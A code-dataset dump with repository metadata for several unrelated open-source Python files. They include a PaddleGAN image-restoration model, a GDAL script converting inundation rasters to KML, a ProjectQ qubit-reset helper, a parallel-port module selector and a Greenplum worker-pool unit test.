1c2c7cb28a9c66943438e1a885f3e8d0f3eca3a9 | 2,870 | py | Python | ppgan/models/mpr_model.py | windstamp/PaddleGAN | 4d9609d0ab9cf1058f564e354dfbc29c0ac3108a | [
"Apache-2.0"
] | 6,852 | 2020-06-18T10:56:27.000Z | 2022-03-31T10:17:47.000Z | ppgan/models/mpr_model.py | HighCWu/PaddleGAN | 32132fa9aa288fbf0325105088b878adfaf16d75 | [
"Apache-2.0"
] | 283 | 2020-07-09T13:29:58.000Z | 2022-03-23T02:50:25.000Z | ppgan/models/mpr_model.py | HighCWu/PaddleGAN | 32132fa9aa288fbf0325105088b878adfaf16d75 | [
"Apache-2.0"
] | 973 | 2020-06-18T11:15:35.000Z | 2022-03-30T10:50:16.000Z | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import paddle.nn as nn
from .builder import MODELS
from .base_model import BaseModel
from .generators.builder import build_generator
from .criterions.builder import build_criterion
from ..modules.init import reset_parameters, init_weights
@MODELS.register()
class MPRModel(BaseModel):
"""MPR Model.
Paper: MPR: Multi-Stage Progressive Image Restoration (CVPR 2021).
https://arxiv.org/abs/2102.02808
"""
def __init__(self, generator, char_criterion=None, edge_criterion=None):
"""Initialize the MPR class.
Args:
generator (dict): config of generator.
char_criterion (dict): config of char criterion.
edge_criterion (dict): config of edge criterion.
"""
super(MPRModel, self).__init__(generator)
self.current_iter = 1
self.nets['generator'] = build_generator(generator)
init_weights(self.nets['generator'])
if char_criterion:
self.char_criterion = build_criterion(char_criterion)
if edge_criterion:
self.edge_criterion = build_criterion(edge_criterion)
def setup_input(self, input):
self.target = input[0]
self.input_ = input[1]
def train_iter(self, optims=None):
optims['optim'].clear_gradients()
restored = self.nets['generator'](self.input_)
loss_char = []
loss_edge = []
for i in range(len(restored)):
loss_char.append(self.char_criterion(restored[i], self.target))
loss_edge.append(self.edge_criterion(restored[i], self.target))
loss_char = paddle.stack(loss_char)
loss_edge = paddle.stack(loss_edge)
loss_char = paddle.sum(loss_char)
loss_edge = paddle.sum(loss_edge)
loss = (loss_char) + (0.05 * loss_edge)
loss.backward()
optims['optim'].step()
self.losses['loss'] = loss.numpy()
def forward(self):
"""Run forward pass; called by both functions <train_iter> and <test_iter>."""
pass
def init_edvr_weight(net):
def reset_func(m):
if hasattr(m, 'weight') and (not isinstance(
m, (nn.BatchNorm, nn.BatchNorm2D))):
reset_parameters(m)
net.apply(reset_func)
| 32.247191 | 86 | 0.668641 |
import paddle
import paddle.nn as nn
from .builder import MODELS
from .base_model import BaseModel
from .generators.builder import build_generator
from .criterions.builder import build_criterion
from ..modules.init import reset_parameters, init_weights
@MODELS.register()
class MPRModel(BaseModel):
def __init__(self, generator, char_criterion=None, edge_criterion=None):
super(MPRModel, self).__init__(generator)
self.current_iter = 1
self.nets['generator'] = build_generator(generator)
init_weights(self.nets['generator'])
if char_criterion:
self.char_criterion = build_criterion(char_criterion)
if edge_criterion:
self.edge_criterion = build_criterion(edge_criterion)
def setup_input(self, input):
self.target = input[0]
self.input_ = input[1]
def train_iter(self, optims=None):
optims['optim'].clear_gradients()
restored = self.nets['generator'](self.input_)
loss_char = []
loss_edge = []
for i in range(len(restored)):
loss_char.append(self.char_criterion(restored[i], self.target))
loss_edge.append(self.edge_criterion(restored[i], self.target))
loss_char = paddle.stack(loss_char)
loss_edge = paddle.stack(loss_edge)
loss_char = paddle.sum(loss_char)
loss_edge = paddle.sum(loss_edge)
loss = (loss_char) + (0.05 * loss_edge)
loss.backward()
optims['optim'].step()
self.losses['loss'] = loss.numpy()
def forward(self):
pass
def init_edvr_weight(net):
def reset_func(m):
if hasattr(m, 'weight') and (not isinstance(
m, (nn.BatchNorm, nn.BatchNorm2D))):
reset_parameters(m)
net.apply(reset_func)
| true | true |
1c2c7cc33c3845044ace8661de804165d0fbb5df | 9,169 | py | Python | inun4d_kml.py | larryyin/barrier_interp | 0836a1678117bba687e60fe0eb18fd29cae52a9f | [
"Unlicense"
] | 2 | 2017-09-21T06:00:43.000Z | 2020-03-19T03:58:41.000Z | inun4d_kml.py | larryyin/barrier_interp | 0836a1678117bba687e60fe0eb18fd29cae52a9f | [
"Unlicense"
] | null | null | null | inun4d_kml.py | larryyin/barrier_interp | 0836a1678117bba687e60fe0eb18fd29cae52a9f | [
"Unlicense"
] | null | null | null | #%%
import time
start = time.time()
#import gdal, ogr, osr
from osgeo import gdal
from osgeo import ogr
from osgeo import osr
from osgeo.gdalnumeric import *
from osgeo.gdalconst import *
#import numpy as np
#import scipy.ndimage as ndimage
#import pandas as pd
from subprocess import call
from itertools import compress
#import skfmm
#import stateplane
#import pylab as p
#%matplotlib inline
file_bool2 = '../inun_nj/inun_bool2.tif'
file_poly2 = '../inun_nj/inun_poly2'
file_wl = '../inun_nj/wl.kml'
#%%
call(['gdal_polygonize.py', '-nomask', file_bool2, '-b', '1', '-q', file_poly2])
#%% Polygon of wl
print('Constructing inundation polygons...')
with open(file_poly2,'r') as f_poly:
text_all = f_poly.read().replace('\n', '')
dn = []
for item in text_all.split("</ogr:DN>"):
if "<ogr:DN>" in item:
dn.append(item [ item.find("<ogr:DN>")+len("<ogr:DN>") : ])
dn = [int(v) for v in dn[:]]
outer_block = []
for item in text_all.split("</gml:coordinates></gml:LinearRing></gml:outerBoundaryIs>"):
if "<gml:outerBoundaryIs><gml:LinearRing><gml:coordinates>" in item:
outer_block.append(item [ item.find("<gml:outerBoundaryIs><gml:LinearRing><gml:coordinates>")+
len("<gml:outerBoundaryIs><gml:LinearRing><gml:coordinates>") : ])
outer = [[[float(v6) for v6 in v5] for v5 in v4] for v4 in
[[v3.split(',') for v3 in v2] for v2 in
[v.split(' ') for v in outer_block]]]
fm = []
for item in text_all.split("</gml:featureMember>"):
if "<gml:featureMember>" in item:
fm.append(item [ item.find("<gml:featureMember>")+len("<gml:featureMember>") : ])
inner = []
inner_count = []
for i in range(len(fm)):
inner_block = []
for item in fm[i].split("</gml:coordinates></gml:LinearRing></gml:innerBoundaryIs>"):
if "<gml:innerBoundaryIs><gml:LinearRing><gml:coordinates>" in item:
inner_block.append(item [ item.find("<gml:innerBoundaryIs><gml:LinearRing><gml:coordinates>")+
len("<gml:innerBoundaryIs><gml:LinearRing><gml:coordinates>") : ])
if not inner_block:
inner.append([])
inner_count.append(0)
else:
inner.append([[[float(v6) for v6 in v5] for v5 in v4] for v4 in
[[v3.split(',') for v3 in v2] for v2 in
[v.split(' ') for v in inner_block]]])
inner_count.append(len(inner[-1]))
dn1 = [v==1 for v in dn]
outer1 = list(compress(outer, dn1))
inner1 = list(compress(inner, dn1))
inner_count1 = list(compress(inner_count, dn1))
dn2 = [v==2 for v in dn]
outer2 = list(compress(outer, dn2))
inner2 = list(compress(inner, dn2))
inner_count2 = list(compress(inner_count, dn2))
dn3 = [v==3 for v in dn]
outer3 = list(compress(outer, dn3))
inner3 = list(compress(inner, dn3))
inner_count3 = list(compress(inner_count, dn3))
dn3 = [v==3 for v in dn]
outer3 = list(compress(outer, dn3))
inner3 = list(compress(inner, dn3))
inner_count3 = list(compress(inner_count, dn3))
dn4 = [v==4 for v in dn]
outer4 = list(compress(outer, dn4))
inner4 = list(compress(inner, dn4))
inner_count4 = list(compress(inner_count, dn4))
dn5 = [v==5 for v in dn]
outer5 = list(compress(outer, dn5))
inner5 = list(compress(inner, dn5))
inner_count5 = list(compress(inner_count, dn5))
c_empty = '00000000'
c_1 = 'AB00FF00'
c_2 = 'AB00FFFF'
c_3 = 'AB0080FF'
c_4 = 'AB0000FF'
c_5 = 'ABCC00CC'
s = []
s = """<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
<Document>
<name>{title}</name>""".format(title=title_str)
s += """
<Style id="s_1">
<LineStyle>
<color>{c0}</color>
<width>0</width>
</LineStyle>
<PolyStyle>
<color>{c}</color>
</PolyStyle>
</Style>""".format(c=c_1,c0=c_empty)
s += """
<Style id="s_2">
<LineStyle>
<color>{c0}</color>
<width>0</width>
</LineStyle>
<PolyStyle>
<color>{c}</color>
</PolyStyle>
</Style>""".format(c=c_2,c0=c_empty)
s += """
<Style id="s_3">
<LineStyle>
<color>{c0}</color>
<width>0</width>
</LineStyle>
<PolyStyle>
<color>{c}</color>
</PolyStyle>
</Style>""".format(c=c_3,c0=c_empty)
s += """
<Style id="s_4">
<LineStyle>
<color>{c0}</color>
<width>0</width>
</LineStyle>
<PolyStyle>
<color>{c}</color>
</PolyStyle>
</Style>""".format(c=c_4,c0=c_empty)
s += """
<Style id="s_5">
<LineStyle>
<color>{c0}</color>
<width>0</width>
</LineStyle>
<PolyStyle>
<color>{c}</color>
</PolyStyle>
</Style>""".format(c=c_5,c0=c_empty)
for i in range(len(outer1)):
s += """
<Placemark>
<name>{id:d}</name>
<visibility>1</visibility>
<styleUrl>#s_1</styleUrl>
<Polygon>
<extrude>0</extrude>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<outerBoundaryIs>
<LinearRing>
<coordinates>""".format(id=i)
for ii in range(len(outer1[i])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=outer1[i][ii][0],lat=outer1[i][ii][1])
s += """
</coordinates>
</LinearRing>
</outerBoundaryIs>"""
if inner_count1[i]>0:
for ii in range(inner_count1[i]):
s += """
<innerBoundaryIs>
<LinearRing>
<coordinates>"""
for iii in range(len(inner1[i][ii])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=inner1[i][ii][iii][0],lat=inner1[i][ii][iii][1])
s += """
</coordinates>
</LinearRing>
</innerBoundaryIs>"""
s += """
</Polygon>
</Placemark>"""
for i in range(len(outer2)):
s += """
<Placemark>
<name>{id:d}</name>
<visibility>1</visibility>
<styleUrl>#s_2</styleUrl>
<Polygon>
<extrude>0</extrude>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<outerBoundaryIs>
<LinearRing>
<coordinates>""".format(id=i)
for ii in range(len(outer2[i])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=outer2[i][ii][0],lat=outer2[i][ii][1])
s += """
</coordinates>
</LinearRing>
</outerBoundaryIs>"""
if inner_count2[i]>0:
for ii in range(inner_count2[i]):
s += """
<innerBoundaryIs>
<LinearRing>
<coordinates>"""
for iii in range(len(inner2[i][ii])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=inner2[i][ii][iii][0],lat=inner2[i][ii][iii][1])
s += """
</coordinates>
</LinearRing>
</innerBoundaryIs>"""
s += """
</Polygon>
</Placemark>"""
for i in range(len(outer3)):
s += """
<Placemark>
<name>{id:d}</name>
<visibility>1</visibility>
<styleUrl>#s_3</styleUrl>
<Polygon>
<extrude>0</extrude>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<outerBoundaryIs>
<LinearRing>
<coordinates>""".format(id=i)
for ii in range(len(outer3[i])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=outer3[i][ii][0],lat=outer3[i][ii][1])
s += """
</coordinates>
</LinearRing>
</outerBoundaryIs>"""
if inner_count3[i]>0:
for ii in range(inner_count3[i]):
s += """
<innerBoundaryIs>
<LinearRing>
<coordinates>"""
for iii in range(len(inner3[i][ii])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=inner3[i][ii][iii][0],lat=inner3[i][ii][iii][1])
s += """
</coordinates>
</LinearRing>
</innerBoundaryIs>"""
s += """
</Polygon>
</Placemark>"""
for i in range(len(outer4)):
s += """
<Placemark>
<name>{id:d}</name>
<visibility>1</visibility>
<styleUrl>#s_4</styleUrl>
<Polygon>
<extrude>0</extrude>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<outerBoundaryIs>
<LinearRing>
<coordinates>""".format(id=i)
for ii in range(len(outer4[i])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=outer4[i][ii][0],lat=outer4[i][ii][1])
s += """
</coordinates>
</LinearRing>
</outerBoundaryIs>"""
if inner_count4[i]>0:
for ii in range(inner_count4[i]):
s += """
<innerBoundaryIs>
<LinearRing>
<coordinates>"""
for iii in range(len(inner4[i][ii])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=inner4[i][ii][iii][0],lat=inner4[i][ii][iii][1])
s += """
</coordinates>
</LinearRing>
</innerBoundaryIs>"""
s += """
</Polygon>
</Placemark>"""
for i in range(len(outer5)):
s += """
<Placemark>
<name>{id:d}</name>
<visibility>1</visibility>
<styleUrl>#s_5</styleUrl>
<Polygon>
<extrude>0</extrude>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<outerBoundaryIs>
<LinearRing>
<coordinates>""".format(id=i)
for ii in range(len(outer5[i])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=outer5[i][ii][0],lat=outer5[i][ii][1])
s += """
</coordinates>
</LinearRing>
</outerBoundaryIs>"""
if inner_count5[i]>0:
for ii in range(inner_count5[i]):
s += """
<innerBoundaryIs>
<LinearRing>
<coordinates>"""
for iii in range(len(inner5[i][ii])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=inner5[i][ii][iii][0],lat=inner5[i][ii][iii][1])
s += """
</coordinates>
</LinearRing>
</innerBoundaryIs>"""
s += """
</Polygon>
</Placemark>"""
s += """
</Document>
</kml>"""
with open(file_wl,'w') as f_kml:
f_kml.writelines(s)
#%%
end = time.time()
print(end - start)
| 22.97995 | 106 | 0.599629 |
import time
start = time.time()
from osgeo import gdal
from osgeo import ogr
from osgeo import osr
from osgeo.gdalnumeric import *
from osgeo.gdalconst import *
from subprocess import call
from itertools import compress
file_bool2 = '../inun_nj/inun_bool2.tif'
file_poly2 = '../inun_nj/inun_poly2'
file_wl = '../inun_nj/wl.kml'
call(['gdal_polygonize.py', '-nomask', file_bool2, '-b', '1', '-q', file_poly2])
print('Constructing inundation polygons...')
with open(file_poly2,'r') as f_poly:
text_all = f_poly.read().replace('\n', '')
dn = []
for item in text_all.split("</ogr:DN>"):
if "<ogr:DN>" in item:
dn.append(item [ item.find("<ogr:DN>")+len("<ogr:DN>") : ])
dn = [int(v) for v in dn[:]]
outer_block = []
for item in text_all.split("</gml:coordinates></gml:LinearRing></gml:outerBoundaryIs>"):
if "<gml:outerBoundaryIs><gml:LinearRing><gml:coordinates>" in item:
outer_block.append(item [ item.find("<gml:outerBoundaryIs><gml:LinearRing><gml:coordinates>")+
len("<gml:outerBoundaryIs><gml:LinearRing><gml:coordinates>") : ])
outer = [[[float(v6) for v6 in v5] for v5 in v4] for v4 in
[[v3.split(',') for v3 in v2] for v2 in
[v.split(' ') for v in outer_block]]]
fm = []
for item in text_all.split("</gml:featureMember>"):
if "<gml:featureMember>" in item:
fm.append(item [ item.find("<gml:featureMember>")+len("<gml:featureMember>") : ])
inner = []
inner_count = []
for i in range(len(fm)):
inner_block = []
for item in fm[i].split("</gml:coordinates></gml:LinearRing></gml:innerBoundaryIs>"):
if "<gml:innerBoundaryIs><gml:LinearRing><gml:coordinates>" in item:
inner_block.append(item [ item.find("<gml:innerBoundaryIs><gml:LinearRing><gml:coordinates>")+
len("<gml:innerBoundaryIs><gml:LinearRing><gml:coordinates>") : ])
if not inner_block:
inner.append([])
inner_count.append(0)
else:
inner.append([[[float(v6) for v6 in v5] for v5 in v4] for v4 in
[[v3.split(',') for v3 in v2] for v2 in
[v.split(' ') for v in inner_block]]])
inner_count.append(len(inner[-1]))
dn1 = [v==1 for v in dn]
outer1 = list(compress(outer, dn1))
inner1 = list(compress(inner, dn1))
inner_count1 = list(compress(inner_count, dn1))
dn2 = [v==2 for v in dn]
outer2 = list(compress(outer, dn2))
inner2 = list(compress(inner, dn2))
inner_count2 = list(compress(inner_count, dn2))
dn3 = [v==3 for v in dn]
outer3 = list(compress(outer, dn3))
inner3 = list(compress(inner, dn3))
inner_count3 = list(compress(inner_count, dn3))
dn3 = [v==3 for v in dn]
outer3 = list(compress(outer, dn3))
inner3 = list(compress(inner, dn3))
inner_count3 = list(compress(inner_count, dn3))
dn4 = [v==4 for v in dn]
outer4 = list(compress(outer, dn4))
inner4 = list(compress(inner, dn4))
inner_count4 = list(compress(inner_count, dn4))
dn5 = [v==5 for v in dn]
outer5 = list(compress(outer, dn5))
inner5 = list(compress(inner, dn5))
inner_count5 = list(compress(inner_count, dn5))
c_empty = '00000000'
c_1 = 'AB00FF00'
c_2 = 'AB00FFFF'
c_3 = 'AB0080FF'
c_4 = 'AB0000FF'
c_5 = 'ABCC00CC'
s = []
s = """<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
<Document>
<name>{title}</name>""".format(title=title_str)
s += """
<Style id="s_1">
<LineStyle>
<color>{c0}</color>
<width>0</width>
</LineStyle>
<PolyStyle>
<color>{c}</color>
</PolyStyle>
</Style>""".format(c=c_1,c0=c_empty)
s += """
<Style id="s_2">
<LineStyle>
<color>{c0}</color>
<width>0</width>
</LineStyle>
<PolyStyle>
<color>{c}</color>
</PolyStyle>
</Style>""".format(c=c_2,c0=c_empty)
s += """
<Style id="s_3">
<LineStyle>
<color>{c0}</color>
<width>0</width>
</LineStyle>
<PolyStyle>
<color>{c}</color>
</PolyStyle>
</Style>""".format(c=c_3,c0=c_empty)
s += """
<Style id="s_4">
<LineStyle>
<color>{c0}</color>
<width>0</width>
</LineStyle>
<PolyStyle>
<color>{c}</color>
</PolyStyle>
</Style>""".format(c=c_4,c0=c_empty)
s += """
<Style id="s_5">
<LineStyle>
<color>{c0}</color>
<width>0</width>
</LineStyle>
<PolyStyle>
<color>{c}</color>
</PolyStyle>
</Style>""".format(c=c_5,c0=c_empty)
for i in range(len(outer1)):
s += """
<Placemark>
<name>{id:d}</name>
<visibility>1</visibility>
<styleUrl>#s_1</styleUrl>
<Polygon>
<extrude>0</extrude>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<outerBoundaryIs>
<LinearRing>
<coordinates>""".format(id=i)
for ii in range(len(outer1[i])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=outer1[i][ii][0],lat=outer1[i][ii][1])
s += """
</coordinates>
</LinearRing>
</outerBoundaryIs>"""
if inner_count1[i]>0:
for ii in range(inner_count1[i]):
s += """
<innerBoundaryIs>
<LinearRing>
<coordinates>"""
for iii in range(len(inner1[i][ii])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=inner1[i][ii][iii][0],lat=inner1[i][ii][iii][1])
s += """
</coordinates>
</LinearRing>
</innerBoundaryIs>"""
s += """
</Polygon>
</Placemark>"""
for i in range(len(outer2)):
s += """
<Placemark>
<name>{id:d}</name>
<visibility>1</visibility>
<styleUrl>#s_2</styleUrl>
<Polygon>
<extrude>0</extrude>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<outerBoundaryIs>
<LinearRing>
<coordinates>""".format(id=i)
for ii in range(len(outer2[i])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=outer2[i][ii][0],lat=outer2[i][ii][1])
s += """
</coordinates>
</LinearRing>
</outerBoundaryIs>"""
if inner_count2[i]>0:
for ii in range(inner_count2[i]):
s += """
<innerBoundaryIs>
<LinearRing>
<coordinates>"""
for iii in range(len(inner2[i][ii])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=inner2[i][ii][iii][0],lat=inner2[i][ii][iii][1])
s += """
</coordinates>
</LinearRing>
</innerBoundaryIs>"""
s += """
</Polygon>
</Placemark>"""
for i in range(len(outer3)):
s += """
<Placemark>
<name>{id:d}</name>
<visibility>1</visibility>
<styleUrl>#s_3</styleUrl>
<Polygon>
<extrude>0</extrude>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<outerBoundaryIs>
<LinearRing>
<coordinates>""".format(id=i)
for ii in range(len(outer3[i])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=outer3[i][ii][0],lat=outer3[i][ii][1])
s += """
</coordinates>
</LinearRing>
</outerBoundaryIs>"""
if inner_count3[i]>0:
for ii in range(inner_count3[i]):
s += """
<innerBoundaryIs>
<LinearRing>
<coordinates>"""
for iii in range(len(inner3[i][ii])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=inner3[i][ii][iii][0],lat=inner3[i][ii][iii][1])
s += """
</coordinates>
</LinearRing>
</innerBoundaryIs>"""
s += """
</Polygon>
</Placemark>"""
for i in range(len(outer4)):
s += """
<Placemark>
<name>{id:d}</name>
<visibility>1</visibility>
<styleUrl>#s_4</styleUrl>
<Polygon>
<extrude>0</extrude>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<outerBoundaryIs>
<LinearRing>
<coordinates>""".format(id=i)
for ii in range(len(outer4[i])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=outer4[i][ii][0],lat=outer4[i][ii][1])
s += """
</coordinates>
</LinearRing>
</outerBoundaryIs>"""
if inner_count4[i]>0:
for ii in range(inner_count4[i]):
s += """
<innerBoundaryIs>
<LinearRing>
<coordinates>"""
for iii in range(len(inner4[i][ii])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=inner4[i][ii][iii][0],lat=inner4[i][ii][iii][1])
s += """
</coordinates>
</LinearRing>
</innerBoundaryIs>"""
s += """
</Polygon>
</Placemark>"""
for i in range(len(outer5)):
s += """
<Placemark>
<name>{id:d}</name>
<visibility>1</visibility>
<styleUrl>#s_5</styleUrl>
<Polygon>
<extrude>0</extrude>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<outerBoundaryIs>
<LinearRing>
<coordinates>""".format(id=i)
for ii in range(len(outer5[i])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=outer5[i][ii][0],lat=outer5[i][ii][1])
s += """
</coordinates>
</LinearRing>
</outerBoundaryIs>"""
if inner_count5[i]>0:
for ii in range(inner_count5[i]):
s += """
<innerBoundaryIs>
<LinearRing>
<coordinates>"""
for iii in range(len(inner5[i][ii])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=inner5[i][ii][iii][0],lat=inner5[i][ii][iii][1])
s += """
</coordinates>
</LinearRing>
</innerBoundaryIs>"""
s += """
</Polygon>
</Placemark>"""
s += """
</Document>
</kml>"""
with open(file_wl,'w') as f_kml:
f_kml.writelines(s)
end = time.time()
print(end - start)
| true | true |
1c2c7cf6d2836cb75f5b39d865a3c9ab7bf4e33d | 1,024 | py | Python | ProjectQ/utility.py | jclapis/qsfe | 941488f8f8a81a4b7d7fe28414ce14fa478a692a | [
"Apache-2.0"
] | 11 | 2019-06-02T01:47:24.000Z | 2021-08-10T14:54:35.000Z | ProjectQ/utility.py | jclapis/qsfe | 941488f8f8a81a4b7d7fe28414ce14fa478a692a | [
"Apache-2.0"
] | null | null | null | ProjectQ/utility.py | jclapis/qsfe | 941488f8f8a81a4b7d7fe28414ce14fa478a692a | [
"Apache-2.0"
] | 2 | 2020-04-19T17:39:23.000Z | 2021-03-08T12:35:55.000Z | # ========================================================================
# Copyright (C) 2019 The MITRE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ========================================================================
from projectq.ops import *
def reset(qubits):
"""
Resets all of the given qubits to the |0> state.
Parameters:
qubits (Qureg): The qubits to reset.
"""
for qubit in qubits:
Measure | qubit
if(int(qubit) == 1):
X | qubit | 32 | 74 | 0.587891 |
from projectq.ops import *
def reset(qubits):
for qubit in qubits:
Measure | qubit
if(int(qubit) == 1):
X | qubit | true | true |
1c2c7da22660d395318a62ddab8dbfdcc1d920e1 | 505 | py | Python | parallel/__init__.py | sjwarner-bp/pyparallel | c79718e4fe700286dd27cfe5f756f9b37dcf48e8 | [
"BSD-3-Clause"
] | 36 | 2015-12-12T22:31:35.000Z | 2022-02-15T08:49:51.000Z | parallel/__init__.py | sjwarner-bp/pyparallel | c79718e4fe700286dd27cfe5f756f9b37dcf48e8 | [
"BSD-3-Clause"
] | 12 | 2016-01-05T09:14:26.000Z | 2022-03-11T12:56:53.000Z | parallel/__init__.py | sjwarner-bp/pyparallel | c79718e4fe700286dd27cfe5f756f9b37dcf48e8 | [
"BSD-3-Clause"
] | 23 | 2015-10-30T15:50:21.000Z | 2022-01-05T04:54:20.000Z | # portable parallel port access with python
# this is a wrapper module for different platform implementations
#
# (C)2001-2002 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import os
VERSION = "0.3"
# choose an implementation, depending on os
if os.name == 'nt':
from parallel.parallelwin32 import Parallel # noqa
elif os.name == 'posix':
from parallel.parallelppdev import Parallel # noqa
else:
raise "Sorry no implementation for your platform available."
| 28.055556 | 65 | 0.740594 |
import os
VERSION = "0.3"
if os.name == 'nt':
from parallel.parallelwin32 import Parallel
elif os.name == 'posix':
from parallel.parallelppdev import Parallel
else:
raise "Sorry no implementation for your platform available."
| true | true |
1c2c800b2a7bc83cb88245c0b951b01438ce7102 | 157 | py | Python | framework/QSSF Service/policies/__init__.py | S-Lab-System-Group/HeliosArtifact | ba73838935bd345ea8575b7bcfcc99e5df690c01 | [
"MIT"
] | 5 | 2021-09-20T13:59:55.000Z | 2022-03-16T12:48:08.000Z | framework/QSSF Service/policies/__init__.py | S-Lab-System-Group/HeliosArtifact | ba73838935bd345ea8575b7bcfcc99e5df690c01 | [
"MIT"
] | null | null | null | framework/QSSF Service/policies/__init__.py | S-Lab-System-Group/HeliosArtifact | ba73838935bd345ea8575b7bcfcc99e5df690c01 | [
"MIT"
] | 1 | 2021-10-15T11:39:11.000Z | 2021-10-15T11:39:11.000Z | from .sjf import ShortestJobFirst
from .srtf import ShortestRemainingTimeFirst
from .fifo import FirstInFirstOut
from .qssf import QuasiShortestServiceFirst
| 31.4 | 44 | 0.872611 | from .sjf import ShortestJobFirst
from .srtf import ShortestRemainingTimeFirst
from .fifo import FirstInFirstOut
from .qssf import QuasiShortestServiceFirst
| true | true |
1c2c8181115351ad978174b2d39e3db8876a4800 | 961 | py | Python | gpMgmt/bin/gppylib/commands/test/unit/test_unit_base.py | nurikk/gpdb | 04fe0202c59721826d1eda2b19d73e5572893fcb | [
"PostgreSQL",
"Apache-2.0"
] | 3 | 2017-12-10T16:41:21.000Z | 2020-07-08T12:59:12.000Z | gpMgmt/bin/gppylib/commands/test/unit/test_unit_base.py | nurikk/gpdb | 04fe0202c59721826d1eda2b19d73e5572893fcb | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | gpMgmt/bin/gppylib/commands/test/unit/test_unit_base.py | nurikk/gpdb | 04fe0202c59721826d1eda2b19d73e5572893fcb | [
"PostgreSQL",
"Apache-2.0"
] | 4 | 2017-12-10T16:41:35.000Z | 2020-11-28T12:20:30.000Z | #!/usr/bin/env python
#
# Copyright (c) Greenplum Inc 2012. All Rights Reserved.
#
import os
import shutil
import sys
import unittest2 as unittest
from gppylib.commands.base import Command, CommandResult, WorkerPool
from mock import patch, MagicMock, Mock
class WorkerPoolTestCase(unittest.TestCase):
@patch('gppylib.commands.base.gplog.get_default_logger')
def test_print_progress(self, mock1):
w = WorkerPool(numWorkers=32)
c1 = Command('dummy command1', '')
c2 = Command('dummy command2', '')
w.addCommand(c1)
w.addCommand(c2)
w.join()
w.print_progress(2)
self.assertTrue(mock1.called_with('100.00% of jobs completed'))
@patch('gppylib.commands.base.gplog.get_default_logger')
def test_print_progress_none(self, mock1):
w = WorkerPool(numWorkers=32)
w.print_progress(0)
w.join()
self.assertTrue(mock1.called_with('0.00% of jobs completed'))
| 30.03125 | 71 | 0.685744 |
import os
import shutil
import sys
import unittest2 as unittest
from gppylib.commands.base import Command, CommandResult, WorkerPool
from mock import patch, MagicMock, Mock
class WorkerPoolTestCase(unittest.TestCase):
@patch('gppylib.commands.base.gplog.get_default_logger')
def test_print_progress(self, mock1):
w = WorkerPool(numWorkers=32)
c1 = Command('dummy command1', '')
c2 = Command('dummy command2', '')
w.addCommand(c1)
w.addCommand(c2)
w.join()
w.print_progress(2)
self.assertTrue(mock1.called_with('100.00% of jobs completed'))
@patch('gppylib.commands.base.gplog.get_default_logger')
def test_print_progress_none(self, mock1):
w = WorkerPool(numWorkers=32)
w.print_progress(0)
w.join()
self.assertTrue(mock1.called_with('0.00% of jobs completed'))
| true | true |
1c2c81b6d8dfa3b62cc323911a7c35d38a860cad | 1,642 | py | Python | s3backgrounddelete/s3backgrounddelete/cortx_s3_signal.py | shailesh-vaidya/cortx-s3server-1 | f61d4ab8961f53722feb68f233840326715ca47e | [
"Apache-2.0"
] | 35 | 2020-09-25T07:27:10.000Z | 2022-03-23T07:49:57.000Z | s3backgrounddelete/s3backgrounddelete/cortx_s3_signal.py | shailesh-vaidya/cortx-s3server-1 | f61d4ab8961f53722feb68f233840326715ca47e | [
"Apache-2.0"
] | 1,000 | 2020-09-24T13:10:23.000Z | 2022-03-28T08:19:34.000Z | s3backgrounddelete/s3backgrounddelete/cortx_s3_signal.py | shailesh-vaidya/cortx-s3server-1 | f61d4ab8961f53722feb68f233840326715ca47e | [
"Apache-2.0"
] | 150 | 2020-09-24T14:41:40.000Z | 2022-03-04T05:37:17.000Z | #
# Copyright (c) 2020 Seagate Technology LLC and/or its Affiliates
#
